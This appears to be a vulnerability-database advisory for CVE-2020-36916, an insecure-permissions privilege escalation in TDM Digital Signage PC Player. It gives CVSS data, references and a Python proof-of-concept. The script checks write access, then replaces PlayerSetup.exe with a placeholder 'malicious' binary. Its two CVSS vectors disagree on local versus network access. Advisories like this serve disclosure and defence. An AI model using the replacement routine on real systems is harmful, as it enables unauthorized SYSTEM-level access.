Security Vulnerability Report
中文
CVE-2020-36916 CVSS 8.8 HIGH

CVE-2020-36916

Published: 2026-01-06 16:15:48
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

TDM Digital Signage PC Player 4.1.0.4 contains an elevation of privileges vulnerability that allows authenticated users to modify executable files. Attackers can leverage the 'Modify' permissions for authenticated users to replace executable files with malicious binaries and gain elevated system access.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

TDM Digital Signage PC Player <= 4.1.0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2020-36916 PoC - TDM Digital Signage PC Player Privilege Escalation # Author: Security Research Team # Note: This is for educational and authorized testing purposes only import os import sys import shutil import subprocess def check_vulnerability(): """Check if target directory exists and is writable""" target_dir = r"C:\Program Files\TDM Digital Signage" executable = os.path.join(target_dir, "PlayerSetup.exe") if os.path.exists(target_dir): print(f"[+] Target directory found: {target_dir}") if os.access(target_dir, os.W_OK): print(f"[+] Directory is writable - VULNERABLE") return True, target_dir, executable else: print(f"[-] Directory is not writable") return False, target_dir, executable else: print(f"[-] Target directory not found") return False, target_dir, executable def create_malicious_executable(output_path): """Generate malicious executable that creates privileged reverse shell""" # This would be a compiled malicious binary in real attack # For demonstration, creating a placeholder malicious_code = b'MZ' + b'\x00' * 100 # Simple PE header placeholder try: with open(output_path, 'wb') as f: f.write(malicious_code) print(f"[+] Malicious executable created: {output_path}") return True except Exception as e: print(f"[-] Failed to create malicious executable: {e}") return False def exploit(target_dir, original_exe): """Perform the privilege escalation exploit""" backup_path = original_exe + ".bak" malicious_path = os.path.join(target_dir, "malicious.exe") print("[*] Step 1: Backing up original executable...") try: shutil.copy2(original_exe, backup_path) print(f"[+] Backup created: {backup_path}") except Exception as e: print(f"[-] Backup failed: {e}") return False print("[*] Step 2: Creating malicious executable...") if not create_malicious_executable(malicious_path): return False print("[*] Step 3: Replacing original executable...") try: shutil.copy2(malicious_path, original_exe) print(f"[+] Original executable replaced") except Exception as e: print(f"[-] Replacement failed: {e}") return False print("[*] Step 4: Cleaning up artifacts...") try: os.remove(malicious_path) print("[+] Cleanup complete") except: pass print("[!] Exploit complete - malicious code will execute with SYSTEM privileges") return True if __name__ == "__main__": print("=" * 60) print("CVE-2020-36916 Privilege Escalation PoC") print("Target: TDM Digital Signage PC Player") print("=" * 60) vulnerable, target, exe = check_vulnerability() if vulnerable: print("\n[*] Target is VULNERABLE to CVE-2020-36916") response = input("Proceed with exploit? (y/N): ") if response.lower() == 'y': exploit(target, exe) else: print("\n[-] Target is NOT vulnerable or not found")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2020-36916", "sourceIdentifier": "[email protected]", "published": "2026-01-06T16:15:47.733", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "TDM Digital Signage PC Player 4.1.0.4 contains an elevation of privileges vulnerability that allows authenticated users to modify executable files. Attackers can leverage the 'Modify' permissions for authenticated users to replace executable files with malicious binaries and gain elevated system access."}, {"lang": "es", "value": "TDM Digital Signage PC Player 4.1.0.4 contiene una vulnerabilidad de elevación de privilegios que permite a usuarios autenticados modificar archivos ejecutables. Los atacantes pueden aprovechar los permisos de 'Modificar' para usuarios autenticados para reemplazar archivos ejecutables con binarios maliciosos y obtener acceso elevado al sistema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-732"}]}], "references": [{"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/190627", "source": "[email protected]"}, {"url": "https://packetstorm.news/files/id/159723", "source": "[email protected]"}, {"url": "https://pro.sony/en_NL/products/display-software/tdm-ds1y-tdm-ds3y", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/48953", "source": "[email protected]"}, {"url": "https://www.tdmsignage.com", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/tdm-digital-signage-pc-player-privilege-escalation-via-insecure-permissions", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5604.php", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/48953", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.